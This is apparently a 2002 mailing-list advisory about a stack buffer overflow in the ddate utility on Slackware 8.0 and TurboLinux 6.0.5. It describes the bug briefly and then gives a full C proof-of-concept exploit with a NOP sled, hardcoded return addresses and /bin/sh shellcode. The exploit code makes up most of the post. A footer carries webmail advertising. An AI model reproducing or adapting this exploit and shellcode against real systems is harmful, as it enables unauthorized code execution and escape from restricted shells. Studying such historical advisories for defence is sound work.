Ddate Proof Of Concept Exploit and Bug details

[<le_costantino () ciudad com ar>]

===============================================================================
           [-] Ddate 
           
   [-] Risk: Low. User can obtain an Normal (SH)ell, the user can
             leave a Restricted Shell an obtain an unrestricted shell
                  
   [-] Date: 30 March of 2002   

           [-] Author: Costantino Leandro
   
   
   [-] Vulnerables:  Slackware 8.0
                     TurboLinux 6.0.5
     Maybe other Distros (test it)

           [-] e-mail: le_costantino () ciudad com ar
   
===============================================================================

1)  Intro
2)  Advisorie/Bug
3)  Exploit




--------------------
1  Intro
--------------------

ddate is a program installed by default, on a lot of Linux Distros. Its
convert Gregorian Dates to Discordian Dates.

--------------------
2  Adv/Bug
--------------------
The program dont check the variable length if we use a sintax like this>
        
    ddate +[STRING >420 Size] , make a Segmention Fault.

on Slackwawre 8.0 a  size bigger than 420 will overwrite the EIP, so we can 
execute commands.

On Turbolinux 6.0.5 the buffer is 5 bytes less, with 415 we will overwrite
the EIP.
      

----------------------
3 Exploit 
----------------------

/* /usr/bin/ddate Xploit  , Proof of Concept
    
   Os: Linux - Most Distros, this xploit is best working with Slackware 8.0 and
       TurboLinux 6.0.5, but you may try on another distros if you
       get the Ret Address, or do a Offset brute force.
               
  Author:  Costantino Leandro     le_costantino () ciudad com ar
  
  Risk: Low, is not suid, user can leave an restricted shell and obtain a
        'new' sh shell.

  Date: 30/03/2001
*/

  
#include <stdlib.h>


//Buffer Size 420 + 100 (100 more to have more chance to exploit it)

#define buffer_size  520

//On Turbolinux buffersize is 515

#define turbo_size  515

//This are the possibles RET address i found to exploit it */
//Sometimes you will use RET1, sometimes RET2, etc.
//
#define RET         0xbfffe5ed /*On Slackware 8.0 */
#define RET2        0xbfffd477 
#define RET3        0xbffff9ac
#define RET4        0xbffff64d

//For TurboLinux 6.0.5, possibles RET addrees to exploit it
//
#define RET5        0x7ffffb74
#define RET6        0x7ffffba1
#define RET7        0x7ffffb6a
#define RET8        0x7ffffb4c

#define doffset      0
#define NOP          0x90

char operador[]='+';

unsigned long get_sp(void)
{
   __asm__('movl %esp,%eax');
}
char shellcode[] =
      '\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b'
      '\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd'
      '\x80\xe8\xdc\xff\xff\xff/bin/sh';

void help()
{
printf('#####################################################\n');
printf('DDATE Xploit  (Slackware 8.0/TurboLinux 6.0.5)\n');
printf('--------------------------------------------------\n');      
printf('Use:  ./dxploit RET-Selection Offset (default 0)\n');
printf('--------------------------------------------------\n');
printf('RET-Selection:

Slackware 8.0                                Turbolinux 6.0.5

1   0xbfffe5ed                               5 0x7ffffb74
2   0xbfffd477                               6 0x7ffffba1
3   0xbffff9ac                               7 0x7ffffb6a
4   0xbffff64d                               8 0x7ffffb4c
      
0 Get current address (for other distros) use with differents offsets\n');

printf('###########################################################\n\n');
exit(1);
}
main(int argc, char *argv[])
{
int offset = doffset;
int bsize = buffer_size;
long *pointer_addr;
   long address;
   char *data_string,*point;
char codex[bsize + 1];
int elejido;
   int i;
   
   
memset(codex,0x00,sizeof(codex));


   if(argc>1) { elejido = atoi(argv[1]) ;
}
   else {
help();
   }
if(argc>2) { offset=atoi(argv[2]);
}
   switch(elejido)
     {
      case 0:
  address = get_sp() - offset;
      case 1:
          address = RET - offset;
  break;;
      case 2:
address = RET2 - offset;
        break;;
      case 3:
address = RET3 - offset;
        break;;
case 4:
address = RET4 - offset;
        break;;
//Turbolinux Address
case 5:
address = RET5 - offset;
        break;;
case 6:
address = RET6 - offset;
        break;;
case 7:
address = RET7 - offset;
        break;;
case 8:
address = RET8 - offset;
        break;;
      default:
   help();
   printf('Error: Not a Valide Ret Selection, must be 1 to 8\n');
   exit(1);

     }

   //Change the buffer size if TurboLinux Address Selected

   if(elejido >=5 )
     {
bsize=turbo_size;
     }
     if(!(data_string=malloc(bsize))){
          printf('cannot allocate memory\n');
          exit(1);
   }
   
   

printf('########################################\n');
printf('DDATE Xploit  (Slackware 8.0)\n');
printf('Using address= %x\n',address);
printf('Offset = %d\n',offset);
printf('Type ./dxploit for help\n');
printf('########################################\n\n');

   point = data_string;

   pointer_addr = (long *)point;



   for(i=0;i < bsize ; i+=4)
     *(pointer_addr++) = address;

   for(i=0; i < bsize/2; i++)
     data_string[i] = NOP;
   
   point = data_string + ((bsize/2) - (strlen(shellcode)/2));
   
   for(i=0;i < strlen(shellcode); i++)
     *(point++) = shellcode[i];
   
      data_string[bsize - 1] = '\0';

//We need to execute the args +data_string, so i concatenate the '+' and the 
//data_string on codex variable

     strcat(codex,operador);
        strcat(codex,data_string);

// Same as  ddate +[string] 
   execl('/usr/bin/ddate','ddate',codex,0);

}






__________________________________________________

Todavía no tenés tu Ciudad Internet Mail? Obtenelo ahora! - http://webmail.ciudad.com.ar

Descargá Gratis el nuevo Internet Explorer 6.0, el mejor software para actualizar tu PC.
http://www.ciudad.com.ar/ar/servicios/ie/